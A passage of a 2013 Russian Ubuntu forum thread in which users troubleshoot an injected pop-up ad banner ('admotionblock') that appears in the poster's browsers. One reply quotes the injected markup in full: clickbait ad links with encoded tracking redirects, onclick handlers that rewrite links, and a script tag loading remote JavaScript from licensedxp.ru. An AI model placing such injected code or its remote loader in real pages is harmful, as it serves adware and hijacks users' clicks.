Форум русскоязычного сообщества Ubuntu


Автор Тема: порно-баннер в ubuntu (admotionblock)  (Прочитано 21916 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Д.Н.

  • Новичок
  • *
  • Сообщений: 2
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #15 : 07 Февраля 2013, 23:14:12 »
А добавить адрес в блокировщик доменов (или в host) пробовали?

Оффлайн x1233

  • Автор темы
  • Новичок
  • *
  • Сообщений: 11
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #16 : 08 Февраля 2013, 11:31:16 »
x1233,
Покажите скрин, а? (только чур полный, с панелями и т.д.) Я думаю тут мало кто видел баннер на Ubuntu, любопытно однако! Только чур сиськи-письки замажьте в GIMP-е, пожалуйста.

пожалуйста, полный скрин.

Мало кто видел, но, если это какой-то червь для linux, то скоро многие будут видеть подобное на Ubuntu. На windows антивирусных форумах сообщения про admotionblock сыпятся каждый день...

Это может быть уязвимость браузера. Но в этом случае, почему это проявляется и в Chrome и FF (последние версии из репо). Кэш и настройки сносил - не помогает.

Значит проблема где-то глубже в системе, что вместо нормальной страницы с сервера мой браузер получает страницу с внедренным кодом баннера.

Вот кстати, этот код. Причем на одном и том же сайте этот баннер то появляется, то нет. Видимо, сделано специально, чтобы человек не догадался, что у него вирус - типа "ой, какая-то реклама что-то всплыла, странно... " А если бы появлялось каждый раз, человек бы задумался..

<div id="popDiv" style="position: absolute; width: 212px; left: 1px; top: 1px; background-color: white; z-index: 1000; border: 1px solid black;"><div id="popControl" style="float: right; margin-right: 10px; display: block;"><a href="#" style="font-size: 11px; font-weight: bold; padding: 2px 0px 0px; color: rgb(0, 153, 102); height: 13px; font-family: Tahoma, Arial, sans-serif; display: block;">Закрыть</a></div><div id="cbVUL71h2hldnOUgUHUhmd" style="height: 1007px;"><div id="nbVUL71h2hldnOUgUHUhmd" style="display: block;"><div id="newsblockVUL71h2hldnOUgUHUhmd" class="VUL71h2hldnOUgUHUhmdnb"><a href="http://licensedxp.ru/got.php?l=aWQ9N_Q0NzEmdWlkP_U4M_MyNjU4OSZiaWQ9O_E1O_YmaGlkZWxpbms9MQ=="></a><table rel="800" border="0" cellpadding="1" cellspacing="1" style=" background-color: #FFFFFF; width: 200px;"><tbody><tr><td valign="top" align="center" width="100%"><center><a href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9N_c3Mjg1JnBjPVdieWZRJnQ9MSZyaWQ9M_AmY29tcGlkP_c2MjQ5JmJudW09VlVMNzFoMmhsZG5PVWdVSFVobWQmYmlkP_kxN_k2Jm1jP_ZkNzBiZ_M1N_RiY_cxMzE2ZjJkZWVkZjgyOGZiOWM1JnBvcz0xJnNlc3M9Y_AyY_M3OGU1YmI5Y2MyZ_AyOGYzY_FiMGVmOGZlZDUmcmVmM_1odHRwOi8vc21hcnRyZXNwb25kZXIucnUvJnRiPQ==" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 76249, 'VUL71h2hldnOUgUHUhmd'));" onmouseover="document.getElementById('url2066326973577285').style.color='171717'; document.getElementById('url2066326973577285').style.textDecoration='underline';return true" onmouseout="document.getElementById('url2066326973577285').style.color='';document.getElementById('url2066326973577285').style.textDecoration='';return true" target="_blank"><img class="newsimg" src="http://rs138.img-giganto.net/i/42244/5q36oxSRQFzXu71FC34V.gif" target="_blank" width="200" height="200" alt="Шокирующий репортаж о Заработке!" title="Шокирующий репортаж о Заработке!"></a><br> <div style="display: block; padding-top: 5px"><a class="liVUL71h2hldnOUgUHUhmd" href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9N_c3Mjg1JnBjPVdieWZRJnQ9MSZyaWQ9M_AmY29tcGlkP_c2MjQ5JmJudW09VlVMNzFoMmhsZG5PVWdVSFVobWQmYmlkP_kxN_k2Jm1jP_ZkNzBiZ_M1N_RiY_cxMzE2ZjJkZWVkZjgyOGZiOWM1JnBvcz0xJnNlc3M9Y_AyY_M3OGU1YmI5Y2MyZ_AyOGYzY_FiMGVmOGZlZDUmcmVmM_1odHRwOi8vc21hcnRyZXNwb25kZXIucnUvJnRiPQ==" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 76249, 'VUL71h2hldnOUgUHUhmd'));" target="_blank" id="url2066326973577285" style="">Шокирующий репортаж о Заработке!</a>  </div></center>  </td></tr><tr></tr><tr><td valign="top" align="center" width="100%"><center><a href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NDYwNjMzJnBjPWJocWY3NHdnQlImdD0xJnJpZD04JmNvbXBpZD0zNjk5NSZibnVtPVZV_DcxaDJobGRu_1VnVUhVaG1kJmJpZD05M_U5NiZtYz02ZDcwYmUzN_U0YmE3M_MxNmYyZGVlZGY4MjhmYjljNSZwb3M9MiZzZXNzPWEwMmEzNzhlNWJiOWNjMmUwMjhmM2ExYjBlZjhmZWQ1JnJlZjE9aHR0cDovL3NtYXJ0cmVzcG9uZGVyLnJ1LyZ0Yj0=" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 36995, 'VUL71h2hldnOUgUHUhmd'));" onmouseover="document.getElementById('url2066326973460633').style.color='171717'; document.getElementById('url2066326973460633').style.textDecoration='underline';return true" onmouseout="document.getElementById('url2066326973460633').style.color='';document.getElementById('url2066326973460633').style.textDecoration='';return true" target="_blank"><img class="newsimg" src="http://rs138.img-giganto.net/i/15624/OPCVS37lpzBOvuv.jpg" target="_blank" width="200" height="200" alt="Ученые вычислили идеальное время соития..." title="Ученые вычислили идеальное время соития..."></a><br> <div style="display: block; padding-top: 5px"><a class="liVUL71h2hldnOUgUHUhmd" href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NDYwNjMzJnBjPWJocWY3NHdnQlImdD0xJnJpZD04JmNvbXBpZD0zNjk5NSZibnVtPVZV_DcxaDJobGRu_1VnVUhVaG1kJmJpZD05M_U5NiZtYz02ZDcwYmUzN_U0YmE3M_MxNmYyZGVlZGY4MjhmYjljNSZwb3M9MiZzZXNzPWEwMmEzNzhlNWJiOWNjMmUwMjhmM2ExYjBlZjhmZWQ1JnJlZjE9aHR0cDovL3NtYXJ0cmVzcG9uZGVyLnJ1LyZ0Yj0=" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 36995, 'VUL71h2hldnOUgUHUhmd'));" target="_blank" id="url2066326973460633" style="">В фильмах нам врут! Вот сколько длится ПОЛОВОЙ акт</a>  </div></center>  </td></tr><tr><td valign="top" align="center" width="100%"><center><a href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NjAyO_g1JnBjPWhUSlJEJnQ9MSZyaWQ9M_AmY29tcGlkP_c2MDY1JmJudW09VlVMNzFoMmhsZG5PVWdVSFVobWQmYmlkP_kxN_k2Jm1jP_ZkNzBiZ_M1N_RiY_cxMzE2ZjJkZWVkZjgyOGZiOWM1JnBvcz0yNiZzZXNzPWEwMmEzNzhlNWJiOWNjMmUwMjhmM2ExYjBlZjhmZWQ1JnJlZjE9aHR0cDovL3NtYXJ0cmVzcG9uZGVyLnJ1LyZ0Yj0=" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 76065, 'VUL71h2hldnOUgUHUhmd'));" onmouseover="document.getElementById('url2066326973602985').style.color='171717'; document.getElementById('url2066326973602985').style.textDecoration='underline';return true" onmouseout="document.getElementById('url2066326973602985').style.color='';document.getElementById('url2066326973602985').style.textDecoration='';return true" target="_blank"><img class="newsimg" src="http://rs138.img-giganto.net/i/29464/2Wb7O7v6sw5SeyIY4nS3.jpeg" target="_blank" width="200" height="200" alt="Никаких СМС!" title="Никаких СМС!"></a><br> <div style="display: block; padding-top: 5px"><a class="liVUL71h2hldnOUgUHUhmd" href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NjAyO_g1JnBjPWhUSlJEJnQ9MSZyaWQ9M_AmY29tcGlkP_c2MDY1JmJudW09VlVMNzFoMmhsZG5PVWdVSFVobWQmYmlkP_kxN_k2Jm1jP_ZkNzBiZ_M1N_RiY_cxMzE2ZjJkZWVkZjgyOGZiOWM1JnBvcz0yNiZzZXNzPWEwMmEzNzhlNWJiOWNjMmUwMjhmM2ExYjBlZjhmZWQ1JnJlZjE9aHR0cDovL3NtYXJ0cmVzcG9uZGVyLnJ1LyZ0Yj0=" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 76065, 'VUL71h2hldnOUgUHUhmd'));" target="_blank" id="url2066326973602985">Алла очень обрадовала Максима похудев на 20кг с помощью 25 кадра!</a>  </div></center>  </td></tr><tr><td valign="top" align="center" width="100%"><center><a href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NDAzM_k0JnBjPVpHNXFLVjN4MlImdD0xJnJpZD04JmNvbXBpZD0zNjk5NSZibnVtPVZV_DcxaDJobGRu_1VnVUhVaG1kJmJpZD05M_U5NiZtYz02ZDcwYmUzN_U0YmE3M_MxNmYyZGVlZGY4MjhmYjljNSZwb3M9Mjgmc2Vzcz1hMDJhMzc4Z_ViYjljYzJlMDI4ZjNhMWIwZWY4ZmVkNSZyZWYxPWh0dHA6Ly9zbWFydHJlc3BvbmRlci5ydS8mdGI9" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 36995, 'VUL71h2hldnOUgUHUhmd'));" onmouseover="document.getElementById('url2066326973403194').style.color='171717'; document.getElementById('url2066326973403194').style.textDecoration='underline';return true" onmouseout="document.getElementById('url2066326973403194').style.color='';document.getElementById('url2066326973403194').style.textDecoration='';return true" target="_blank"><img class="newsimg" src="http://rs138.img-giganto.net/i/15624/AIc5GURWD5InUEd.jpg" target="_blank" width="200" height="200" alt="Эта страшная трагедия произошла..." title="Эта страшная трагедия произошла..."></a><br> <div style="display: block; padding-top: 5px"><a class="liVUL71h2hldnOUgUHUhmd" href="http://licensedxp.ru/got.php?l=dWlkP_U4M_MyNjU4OSZpZD01NDQ3MSZ0aWQ9NDAzM_k0JnBjPVpHNXFLVjN4MlImdD0xJnJpZD04JmNvbXBpZD0zNjk5NSZibnVtPVZV_DcxaDJobGRu_1VnVUhVaG1kJmJpZD05M_U5NiZtYz02ZDcwYmUzN_U0YmE3M_MxNmYyZGVlZGY4MjhmYjljNSZwb3M9Mjgmc2Vzcz1hMDJhMzc4Z_ViYjljYzJlMDI4ZjNhMWIwZWY4ZmVkNSZyZWYxPWh0dHA6Ly9zbWFydHJlc3BvbmRlci5ydS8mdGI9" onclick="this.setAttribute('href', __bodyHandler(this.href, event, 36995, 'VUL71h2hldnOUgUHUhmd'));" target="_blank" id="url2066326973403194">Горе! Дочь Ярмольника разбилась в ДТП</a>  </div></center>  </td></tr><tr></tr></tbody></table><a href="http://licensedxp.ru/got.php?l=aWQ9N_Q0NzEmdWlkP_U4M_MyNjU4OSZiaWQ9O_E1O_YmaGlkZWxpbms9MQ=="></a></div><style>#newsblockVUL71h2hldnOUgUHUhmd td{border: 0px solid #FFFFFF; padding: 2px;  background-color: #FFFFFF; white-space: normal;} a.liVUL71h2hldnOUgUHUhmd{font: 13px Arial; color: #454545; text-decoration: none; font-weight: normal;} #newsblockVUL71h2hldnOUgUHUhmd img.newsimg{border: 0px solid #FFFFFF; width: 200px; height: 200px; margin: 0px; position: relative; top: auto; left: auto; z-index: auto;} a.liVUL71h2hldnOUgUHUhmd:hover{color:#171717; text-decoration: underline;}</style></div></div><script type="text/javascript" async="" id="bcriptVUL71h2hldnOUgUHUhmd" src="http://licensedxp.ru/news.php?sid=54471&amp;bn=VUL71h2hldnOUgUHUhmd&amp;ad=0&amp;ref=&amp;pt=Сервис email-рассылок, массовая рассылка писем, email маркетинг - Smartresponder.ru&amp;cookie=null&amp;cls=null"></script></div>
« Последнее редактирование: 08 Февраля 2013, 11:36:14 от x1233 »

Оффлайн Karl500

  • Заслуженный пользователь
  • Старожил
  • *
  • Сообщений: 2267
    • Просмотр профиля

Оффлайн AzraelKDE

  • Активист
  • *
  • Сообщений: 773
  • Kubuntu/Xubuntu user
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #18 : 08 Февраля 2013, 13:16:12 »
Всё таки странная штука. Смекаю, что заражён таки DNS между вами интернетом, попытайтесь сменить DNS сервер (на sequre dns например) и проверить. Если Баннер сохраниться, значит проблема всё-же на вашей локальной машине.

Пользователь решил продолжить мысль 08 Февраля 2013, 13:18:03:
И прошерстите всё-же хомяк на присутствие java скриптов. Если бяка локальная, она явно использует способности современных браузеров по встраиванию пользовательских скриптов.
« Последнее редактирование: 08 Февраля 2013, 13:18:03 от AzraelKDE »
Java + HTML5 = Brain explosion.

Оффлайн x1233

  • Автор темы
  • Новичок
  • *
  • Сообщений: 11
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #19 : 08 Февраля 2013, 14:31:05 »
Не вот это ли причина: http://www.cnews.ru/news/2013/02/06/neulovimyy_troyan_vstraivaetsya_v_brauzer_i_pokazyvaet_vyplyvayushhie_okna_518214

напоминает мой случай, получается браузер тоже взломан. Т.е. это уязвимость нулевого дня (не известная в гугле и мозилле), раз после обновления браузера всё повторяется.. Либо хак где-то глубоко в системе :(

Пользователь решил продолжить мысль 08 Февраля 2013, 14:33:05:
Всё таки странная штука. Смекаю, что заражён таки DNS между вами интернетом

к сожалению это не так, поскольку баннер появляется в 3х разных wifi сетях у разных провайдеров.
« Последнее редактирование: 08 Февраля 2013, 14:33:05 от x1233 »

rapidsp

  • Гость
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #20 : 08 Февраля 2013, 15:13:45 »
x1233,
Я может пропустил... А банальный NoScript не помогает?

Оффлайн ArcFi

  • Старожил
  • *
  • Сообщений: 15189
    • Просмотр профиля
    • aetera.net
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #21 : 08 Февраля 2013, 17:10:24 »
Глянул скрин...
По-моему это на стороне сервера.
Повода для паники не вижу.
Adblock+NoScript в помощь.

Tritus

  • Гость
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #22 : 08 Февраля 2013, 18:38:35 »
Антивирусы в Убунте, как обычно, не нужны...  :coolsmiley:

Предупредил по 2.3 — Дмитрий Бо
« Последнее редактирование: 10 Февраля 2013, 09:16:06 от Дмитрий Бо »

Оффлайн x1233

  • Автор темы
  • Новичок
  • *
  • Сообщений: 11
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #23 : 08 Февраля 2013, 19:16:35 »
Глянул скрин...
По-моему это на стороне сервера.

Дружище, я же пишу, что это вылазит даже на странице моего собственного сайта, где в html никакого внедренного кода баннера нет.


Tritus

  • Гость
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #24 : 08 Февраля 2013, 19:25:50 »
x1233,
попробуйте запустить Live CD с ClamAV, других средств избавиться от напасти я не знаю (кроме как самостоятельно зловреда искать). Может, специалисты по безопасности подскажут что другое..
По-моему, понятно, что причина не в воображаемых серверах, а в проникновении зловреда на локальный компьютер - все симптомы говорят об этом.
« Последнее редактирование: 08 Февраля 2013, 19:29:33 от Tritus »

Оффлайн ArcFi

  • Старожил
  • *
  • Сообщений: 15189
    • Просмотр профиля
    • aetera.net
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #25 : 08 Февраля 2013, 19:33:38 »
это вылазит даже на странице моего собственного сайта, где в html никакого внедренного кода баннера нет
Что за хостинг?
Какой провайдер?
Какие DNS?
Используется ли proxy?
« Последнее редактирование: 09 Февраля 2013, 20:05:03 от ArcFi »

Оффлайн MooSE

  • Старожил
  • *
  • Сообщений: 1111
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #26 : 09 Февраля 2013, 02:11:59 »
Ребят, это жесть. На линуксе больше десяти лет, и тут такое  :'(

В общем, появляется в хроме и файрфоксе порнобаннер почти на всех страницах.. Ссылки ведут на admotionblock.ru

Как лечить - хз. Конфиги и кэш браузеров сносил, Всё ПО обновлено из репозитория. На windows форумах пишут, что это вирус, и он подменяет dns сервера и вместо запрошенной веб-страницы получаешь страницу с внедренным порнобаннером.

Т.е. получается это какой-то глубоких хак, а не просто уязвимость браузера.. Мда :(

Кто что может подсказать? См. приложенный скриншот.

PS. Версия системы - 12.04.


Проверь список установленных дополнений. Лет пять назад видел такой баннер на огнелисе. Его показывал установленный плагин. Снёс плагин и стало хорошо.

Оффлайн PikselNsk

  • Новичок
  • *
  • Сообщений: 18
  • Никто не умрет девственником,жизнь всех поимеет.
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #27 : 09 Февраля 2013, 10:29:52 »
Отметился для слежения. Уж больно интересно.чем закончится даннная эпопея :)
Лисы на лапках разносят заразу,
Увидел лису-убей её сразу!

narsilandruil

  • Гость
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #28 : 09 Февраля 2013, 12:43:21 »
А "чайник" у вас случаем не отображается?

Оффлайн Platon

  • Активист
  • *
  • Сообщений: 899
  • KUbuntu LTS (AMD64)
    • Просмотр профиля
Re: порно-баннер в ubuntu (admotionblock)
« Ответ #29 : 09 Февраля 2013, 12:57:39 »
А "чайник" у вас случаем не отображается?
Люто плюсую, посмотрел скрин и не понял где порнобаннер в левом углу снизу-вверх Пугалкины, девица в красном купальнике и диктор - Хде сиськи-письки порнобаннер?
« Последнее редактирование: 09 Февраля 2013, 13:10:55 от Platon »
"Быть сильным – не значит превосходить в силе, а уметь слабого поднять до высот своих." Рабиндранат Тагор

 

Страница сгенерирована за 0.051 секунд. Запросов: 25.